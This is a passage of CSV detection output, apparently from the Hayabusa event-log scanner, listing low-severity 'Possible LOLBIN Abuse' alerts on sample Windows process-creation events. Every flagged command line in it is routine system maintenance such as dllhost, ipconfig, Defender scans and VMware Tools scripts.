0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 11:20:16.834 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xd48 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 22:57:54.738 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xe60 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 22:57:55.301 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0xef8 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 22:57:59.004 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0x82c | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 22:58:15.410 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xbbc | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 22:59:20.128 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\wuauclt.exe"" /RunHandlerComServer | Path: C:\Windows\System32\wuauclt.exe | PID: 0xb24 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-19 23:01:29.243 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x22c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-20 01:01:36.820 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xf8c | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-20 01:01:36.883 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan -Reinvoke | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x268 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-20 01:01:36.898 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" SignaturesUpdateService -ScheduleJob | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xc68 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-20 01:03:36.695 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe aepdu.dll,AePduRunUpdate | Path: C:\Windows\System32\rundll32.exe | PID: 0x68c | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-20 01:57:08.802 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe /d acproxy.dll,PerformAutochkOperations | Path: C:\Windows\System32\rundll32.exe | PID: 0xc5c | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-20 02:02:48.677 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {995C996E-D918-4a8c-A302-45719A6F4EA7} -Embedding | Path: C:\Windows\System32\rundll32.exe | PID: 0xcbc | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-20 02:02:52.614 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x598 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-20 05:09:55.671 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x3cc | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-20 05:09:57.781 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0xb84 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-20 05:10:11.609 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xe9c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-20 05:10:17.702 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x2f0 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-20 05:12:20.805 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xfd0 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-20 05:12:20.805 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x46c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-20 05:47:30.057 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xe4 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-20 05:47:31.026 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x6a0 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-20 05:47:31.073 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x9c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-20 05:47:46.745 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xe6c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-20 06:12:04.462 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xda0 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-20 06:12:28.290 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x130 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-20 06:12:41.946 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x4b0 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-20 06:13:05.290 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xfe4 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-20 08:02:20.062 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xfe0 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-20 08:02:20.640 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xd18 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-20 08:02:22.265 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x910 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-20 08:02:35.890 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x494 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-20 08:02:40.458 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x720 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-20 08:02:40.458 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x914 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-21 01:03:06.082 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\makecab.exe"" C:\Windows\Logs\CBS\CbsPersist_20160820160305.log C:\Windows\Logs\CBS\CbsPersist_20160820160305.cab | Path: C:\Windows\System32\makecab.exe | PID: 0xce8 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-21 01:03:06.176 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xdb0 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-21 01:03:07.144 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xf34 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-21 01:03:07.801 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x250 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-21 01:03:11.676 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\wuauclt.exe"" /RunHandlerComServer | Path: C:\Windows\System32\wuauclt.exe | PID: 0x614 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-21 01:03:25.629 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc04 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-21 01:06:05.381 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0x598 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-21 03:14:25.528 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x848 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-21 03:14:25.546 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan -Reinvoke | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xd30 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-21 03:14:25.561 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" SignaturesUpdateService -ScheduleJob | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xfb8 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-21 03:16:25.456 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe aepdu.dll,AePduRunUpdate | Path: C:\Windows\System32\rundll32.exe | PID: 0x7b8 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-21 04:31:04.654 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc18 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-21 05:05:57.675 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xdac | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-21 05:05:58.135 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0xb68 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-21 05:06:13.653 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xf2c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-21 05:06:19.672 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xdf0 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-21 05:06:38.077 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xac0 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-21 05:06:38.083 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x578 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-22 06:00:11.250 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xd68 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-22 06:00:12.103 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xc20 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-22 06:00:12.141 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x7b8 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-22 06:00:33.844 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc58 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-22 06:03:11.036 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\sc.exe start w32time task_started | Path: C:\Windows\System32\sc.exe | PID: 0x908 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-22 06:03:11.056 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0xfe4 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-22 06:10:05.018 